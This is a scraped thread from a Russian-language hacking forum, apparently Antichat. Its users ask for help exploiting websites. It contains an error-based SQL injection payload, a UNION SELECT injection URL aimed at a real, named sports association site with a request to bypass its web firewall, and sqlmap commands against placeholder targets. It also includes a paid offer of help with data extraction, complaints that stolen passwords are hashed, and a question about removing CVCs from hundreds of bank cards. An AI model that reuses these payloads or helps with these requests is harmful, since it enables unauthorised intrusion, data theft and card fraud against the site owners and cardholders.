Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    512
    Likes Received:
    921
    Reputations:
    317
    Code:
    ' AND extractvalue(1,concat(0x3a,(select @@version)))-'
    
     
    to the moon likes this.
  2. 2dd

    2dd New Member

    Joined:
    9 Aug 2011
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Уже не в первый раз встречаюсь с ситуацией, когда раскрутив MySQL иньект, при попытке взаимодействия с существующей таблицей, SQL иньект пропадает, и при этом если указать несуществующую таблицу, то всё ок.
    Т.е. при запросе select count(*) from not_exists_table (который следует как подзапрос в error или union based векторах), если таблицы нет, то будет стандартная ошибка Table 'not_exists_table' doesn't exist
    Если же указать реально существующую, то как будто SQL фильтруется. И так на очень многих сайтах. Сайты разные, и друг с другом никак не взаимосвязаны.
    Если кто знает, как решить эту беду, подскажите.
     
  3. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Напишу сюда.
    ребята, кто шарит в sql inj, возможно кто-то желает оказывать персональную помощь, по различным вопросам в джабер за оплату?
    Вопросы в основном по WAF и извлечению данных. (допустим почему выдает 500 ошибку или 400, к примеру)
    Как заливать шелы, получать права и прочее такое не нужно.
    Я мало в этом шарю, пользуюсь sqlmap и burp (automated scan), поэтому объяснять нужно как чайнику доступным языком.
    Именно поэтому готов платить за помощь.
    Так же сотрудничество на перспективу, я щедрый, с теми кто со мной честен и добр)))))
    У меня не совсем тривиальная ситуация, объясню в джабере.
    Пишите : 7jon7doe@cluster.sx

    Много вашего времени не займу, в день может пара тройка вопросов!

    Чуть дополню, мне скорее подойдет человек, который шарит в коде и чуть в скуле. На какие то вопросы ты мне ответишь, в каких-то вместе будем разбираться. Я это к тому, что врятли опытному хакеру нужна будет мелочь))
     
    #2783 Estet, 28 Oct 2019
    Last edited: 28 Oct 2019
  4. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    67
    Likes Received:
    24
    Reputations:
    10
    помогите раздекодить строку. Проверяю и API и вся инфа с формы отправляется в таком виде
    Code:
    5d000008007200000000000000003d8888865474ae3953ed45d37f263bd75edbffa14070ca8100680ed91a004e8f482ba622d6df8a57cf5800cbf802a3eaa2e536c0c7f9c0c3d50668e4f56367357f70f75394537e88edff509845cb5dba03414af6cefedcc2c0c0fe453ca5ff57f3b216a833480a6dc4
    Похоже на hex, но когда пробую декодить выдает какие то непонятные символы. Сайт китайский, может дело в этом. И как в таком случае с этим работать, потому что ни берпом, ни онлайн не вышло
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,612
    Likes Received:
    398
    Reputations:
    230
    Помогите ваф обойти
    Code:
    https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,34,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
     
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    У меня такой вопрос, как легко убрать cvc с несколько сотен банковских карт, нет гаджета для этого?
     
  7. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    Также можно ли сказать банку чтоб выпускать банковские карты без CVV?
     
  8. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    может они тебе и нужны, сайт то
    либо шрифты проверить, что бы стояли нужные (китайский?)

    For Octavian: что за бред?
     
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    ?
     
  10. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
  11. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    285
    Likes Received:
    80
    Reputations:
    1
    kostea likes this.
  12. kostea

    kostea New Member

    Joined:
    23 Dec 2015
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Мда жаль что зашифрованы пароли
     
  13. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
  14. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    151
    Likes Received:
    437
    Reputations:
    34
  15. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,480
    Reputations:
    55
    sqlmap -u "http://site.com/legasy*"
    Руками начать с http://site.com/legasy'+--+- ; http://site.com/legasy'#
     
    john_newman likes this.
  16. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    2,225
    Likes Received:
    9,717
    Reputations:
    110
    BabaDook and john_newman like this.
  17. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,041
    Likes Received:
    1,480
    Reputations:
    55
    sqlmap -u "http://bank.ua/?xxx=123&param=xxxx&lfi=rrr" -p param
     
    john_newman likes this.
Loading...